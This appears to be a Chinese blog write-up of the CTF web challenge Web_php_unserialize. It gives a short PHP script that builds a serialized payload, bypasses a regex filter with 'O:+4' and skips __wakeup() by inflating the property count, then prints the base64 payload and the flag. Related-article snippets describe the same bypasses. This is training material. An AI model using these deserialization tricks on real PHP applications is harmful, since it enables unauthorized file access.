攻防世界 web部分的Web_php_unserialize的writeup

最新推荐文章于 2024-09-26 19:56:30 发布
最新推荐文章于 2024-09-26 19:56:30 发布
阅读量1.4k 收藏 2
点赞数
分类专栏: CTF # web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dchua123/article/details/105249554
版权
CTF 同时被 2 个专栏收录
20 篇文章 4 订阅
订阅专栏
web
1 篇文章 0 订阅
订阅专栏

这个题就是三个点:

1、$file改成fl4g.php;

2、绕过:preg_match('/[oc]:\d+:/i', $var)

3、跳过__wakeup()。

步骤如下:

<?php 
class Demo { 
    private $file = 'fl4g.php';//$file改成fl4g.php
}

$a= serialize(new demo);
$a= str_replace('O:4', 'O:+4',$a);//绕过preg_match
$a= str_replace(':1:', ':2:',$a);//绕过wakeup
echo base64_encode($a);
?>

代码执行得:

TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

执行即可:

flag即为:

ctf{b17bd4c7-34c9-4526-8fa8-a0794a197013}

 

隐藏起来
关注
专栏目录
[CTF刷题篇]攻防世界Web进阶之unserialize3 Writeup
qq_43668710的博客
04-22 651
前言 有了之前的PHP反序列化漏洞实例复现姿势详解这篇文章,突然发现自己终于不再畏惧关于反序列化的题了,刚刚遇见甚至还有一丝兴奋,终于可以验证自己这段时间的付出了! 分析 访问题目中给的url; 很明显,这题就考了2个点: `反序列化` `魔术函数__wakeup()的绕过` 附:绕过__wakeup()的姿势: __wakeup 触发于 unserilize() 调用之前, 当反序列化时的字...
攻防世界 web高手进阶区 10分题 biscuiti-300
闵行小鱼塘
11-07 1096
继续ctf的旅程,开始攻防世界web高手进阶区的10分题,本文是biscuiti-300的writeup
php反序列化姿势学习
彼岸花苏陌的博客
01-16 2489
php反序列化姿势学习1.__wakeup()函数绕过2./[oc]:\d+:/i研究欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 1.__wakeup()函数绕过 wakeup函数作为ph
攻防世界进阶篇– Web_php_unserializeWriteUp
giaogiao123的博客
02-17 1858
先是一串代码审计 看的出来要get一个var=? ?里要满足3个条件 1要绕过wake up 函数 2要绕过正则表达式 3必须是base64加密 首先 有关 PHP 其它魔术方法的内容可以参考 PHP 官方文档 有关 PHP 反序列化漏洞的内容可以参考 PHP 反序列化漏洞 那么开始正解题目 wake up这个函数大家都了解过 那么我们先序列化这个var 而正则匹配的规则是: 在不区分大...
PHP反序列化2(OC绕过.wakeup绕过)
最新发布
2302_81328699的博客
09-26 652
PHP反序列化2(OC绕过.wakeup绕过)
WebWeb_php_unserializeWriteUp【序列化与反序列化】
我的博客
08-19 486
刚才做了一道 PHP 反序列化的题目 , 题目虽简单但考察的点挺经典的 , 这里转载一个帖子总结记录一下 题目 题目是这样的 很明显是一道 PHP 反序列化的题目 , 直接来看题目给出的流程 首先判断当前是否存在 GET 参数 " var " , 若存在则对其进行 Base64 解码后存入 $var 变量 . 若不存在则输出当前页面源码 对 $var 进行一个正则过滤 , 若通过正则过滤 , 则对其进行反序列化操作 , 否则响应提示信息 . 题目中给出一个 Demo 类 , 需
关于正则匹配preg_match(‘/^O:\d+/‘)的绕过的几种方法
m0_63138919的博客
10-13 2372
本文为preg_match('/^O:d+/')正则 匹配绕过的方法
讲讲PHP序列化和反序列化解析
pipujopijhpo的博客
04-19 185
序列化 序列化格式 在PHP中,序列化用于存储或传递 PHP 的值的过程中,同时不丢失其类型和结构。 序列化函数原型如下: string serialize ( mixed $value ) 先看下面的例子: class CC { public $data; private $pass; public function __construct($data, $pass) { $this->data = $data; $this-&
反序列化题目
weixin_45090021的博客
09-10 122
本题需要绕过一个__wakeup()函数和一个正则匹配preg_match('/[oc]:\d+:/i', $var)__wakeup():在反序列化执行之前,会先执行__wakeup这个魔术方法,所以需要绕过。绕过__wakeup()是利用CVE-2016-7124漏洞,即反序列化时,如果表示对象属性个数的值大于真实的属性个数时就会跳过__wakeup( )的执行。正则匹配preg_match('/[oc]:\d+:/i', $var)如果出现的字符出现在存储的字典中则匹配成功。
攻防世界】十二 --- unserialize3 --- php反序列化
qq_43168364的博客
12-25 554
题目 — unserialize3 一、writeup 一道php反序列化的题 关键点: 当审出存在反序列化漏洞时,我们将对应的那个类拿出到自己的php环境中,先用恶意字符串实例化该类然后用serialize()函数,进行序列化,将序列化好的东西抛出到环境中即可造成反序列化漏洞 当$flag='111’是可以看到flag,通过?code查询字符串来传入需要反序列化的字符串 反序列时会自动调用__wakeup() 函数,导致程序结束执行,因此要绕过 __wakeup() 函数(绕过的方法在知识点中有介绍)
攻防世界题目练习——Web难度1(二)_&lt; php highlight_file(__file__); include(&quot;(1)
2301_79054215的博客
04-20 1055
是Linux中的一个特殊变量,它代表了当前的字段分隔符,它的默认值是空格、制表符和换行符,当输入命令时,会以空格、制表符或换行符作为分隔符,将输入的内容分割成不同的字段,每个字段将作为命令的一个参数进行解析和执行。现在我们知道了waf函数过滤的有哪些字符或字符串,我们要避免直接输入这些关键词,但是有些字符在我们查找flag的过程中不可避免地会用到,因此我们对它们进行绕过,绕过的方式有如下几种。函数进行了匹配,第一个参数是给定的用来模式匹配的正则表达式,第二个参数是输入的要匹配的字符串。
objective-c中正则表达式
12-10
oc中正则表达式的使用,主要涉及了特殊符号转义字符的处理。 ([ ] \ )三个特殊符号的处理。 验证了邮箱、手机、昵称、密码。
Dest0g3 520迎新赛 writeup (misc部分 + web部分)
ShenZ的博客
05-30 3985
Dest0g3 520迎新赛 Welcome to fxxking DestCTF 你知道js吗 StrangeTraffic Pngenius EasyWord EasyEncode Python_jail rookie hacker-1 rookie hacker-2 4096 EasySSTI phpdest EasyPHP SimpleRCE funny_upload middle PharPOP 1.phar的上传与触发 2.POP链 NodeSoEasy ezip Really Easy Sql
两道反序列化例题
limenzzz的博客
05-03 1288
攻防世界: 1.Web_php_unserialize 先代码审计,发现定义了demo类,而在其中有一句 这个函数说明在销毁demo时会高亮回显file。而且前面提示flag在fl4g.php中,于是需要构造反序列化的demo类,且要绕过wake_up函数,根据上篇可知,只要输入的数据数少于规定的就可以绕过。于是需要构造 O:4:"demo":1:{s:10:"Demofile";s:8:"fl4g.php";} //原构造,未构建任何绕过 O:4:"demo":2:{s:10:"De
ctfshow 反序列化篇
m0_62422842的博客
07-07 2039
涉及到的题目是web254~web266
php函数
weixin_43995930的博客
10-09 378
php函数希望能够帮助到你serialize() -- 对象序列化功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 希望...
Web_php_unserialize
怪味巧克力的博客
05-25 3390
前言: 看到好的知识点就喜欢记录下来,一是为了方便自己以后复习,二是也能帮助大家了解知识点 知识点: 1、__construct():当对象创建(new)时会自动调用。但在 unserialize() 时是不会自动调用的。(构造函数) 2、__destruct():当对象被销毁时会自动调用。(析构函数) 3、__wakeup():unserialize() 时会自动调用 。 首先拿到题目看到给出一段PHP源码 <?php class Demo { private $file = 'inde
安恒月赛writeup 2018年12月
SsMing的博客
12-23 1615
目录 misc1 misc2(签到) misc3 (学习资料) misc4(JUJU) web1 web2 pwn1 misc和web,和一道pwn misc1 看提示想到去下当时泄露的库 然后写脚本处理一下把数据库的内容,生成三个由用户名,密码,邮箱组成的字典,使用密码组成的字典爆开了压缩包 解压后得到个动图,记录上面的数字得到236855282761588523...
攻防世界web_php_unserialize
06-28
攻防世界web_php_unserialize是一个关于PHP反序列化漏洞的题目,需要掌握PHP反序列化漏洞的原理和利用方法。在这个题目中,可能会给出一个序列化的字符串,需要将其反序列化并进行一些操作,最终达到获取flag的目的...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值